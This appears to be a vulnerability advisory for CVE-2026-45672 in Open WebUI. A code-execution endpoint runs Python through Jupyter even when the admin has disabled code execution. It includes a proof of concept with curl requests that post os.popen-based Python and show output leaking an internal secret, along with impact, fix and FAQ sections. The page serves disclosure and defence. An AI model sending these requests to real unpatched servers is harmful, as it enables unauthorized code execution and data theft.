CVE-2026-45672: Open WebUI: Jupyter code execution works despite `ENABLE_CODE_EXECUTION=false` — feature gate bypassed
Summary
The /api/v1/utils/code/execute endpoint executes arbitrary Python code via Jupyter for any verified user, even when the admin has set ENABLECODEEXECUTION=false. The feature gate is not enforced on the API endpoint — the configuration says "disabled" but code still executes.
Details
The admin configuration correctly shows ENABLECODEEXECUTION: false. However, the code execution endpoint does not check this flag before forwarding Python code to the Jupyter server. Any authenticated user can execute arbitrary code in the Jupyter container.
PoC
Verified against Open WebUI v0.8.11 (latest) Docker on 2026-03-25.
Setup: Jupyter server connected, ENABLECODEEXECUTION=false confirmed in admin config.
bash Step 1: Verify code execution is disabled curl -s http://target:8080/api/v1/configs/codeexecution \ -H "Authorization: Bearer $TOKEN" Returns: {"ENABLECODEEXECUTION": false, ...}
Step 2: Execute code anyway — gate bypassed curl -s -X POST http://target:8080/api/v1/utils/code/execute \ -H "Authorization: Bearer $TOKEN" \ -H 'Content-Type: application/json' \ -d '{"code":"import os; print(os.popen(\"id\").read())"}'
Verified output:
Config: {"ENABLECODEEXECUTION":false,"CODEEXECUTIONENGINE":"jupyter",...}
executestatus=200 executebody={"stdout":"OPEN-WEBUI-SSRF-SECRET","stderr":"","result":""}
The PoC read the internal secret service content via Jupyter — despite ENABLECODEEXECUTION=false. The Jupyter container has network access to internal services, making this both a code execution bypass and an SSRF vector.
Impact
Any authenticated user can execute arbitrary Python code in the Jupyter container, even when the admin has explicitly disabled code execution:
- Arbitrary code execution in the Jupyter container (read files, spawn processes) - Network access to all internal Docker services from the Jupyter container - Data exfiltration from internal services - The admin's security configuration (ENABLECODEEXECUTION=false) is silently ineffective - Users who are told "code execution is disabled" have a false sense of security
Resolution
Fixed in commit 6d736d3c5, first released in v0.8.12. The /api/v1/utils/code/execute handler in backend/openwebui/routers/utils.py now checks request.app.state.config.ENABLECODEEXECUTION before dispatching to the Jupyter engine and returns 403 with FEATUREDISABLED('Code execution') when the admin has disabled the flag. The retrieval-side code path was gated in the same commit. Users on >= 0.8.12 are not affected.
Other sources
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.12, the /api/v1/utils/code/execute endpoint executes arbitrary Python code via Jupyter for any verified user, even when the admin has set ENABLECODEEXECUTION=false. The feature gate is not enforced on the API endpoint — the configuration says "disabled" but code still executes. This vulnerability is fixed in 0.8.12.
— MITRE
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2026-45672?
CVE-2026-45672 is considered a critical vulnerability due to improper restriction on code execution.
How do I fix CVE-2026-45672?
To fix CVE-2026-45672, upgrade open-webui to version 0.8.12 or later.
What are the affected versions related to CVE-2026-45672?
CVE-2026-45672 affects open-webui versions prior to 0.8.12, specifically including all versions up to 0.8.11.
What impact does CVE-2026-45672 have on users?
CVE-2026-45672 allows authenticated users to execute arbitrary Python code, potentially compromising the system.
Is there a workaround for CVE-2026-45672?
There are no recommended workarounds for CVE-2026-45672; upgrading to the fixed version is the only solution.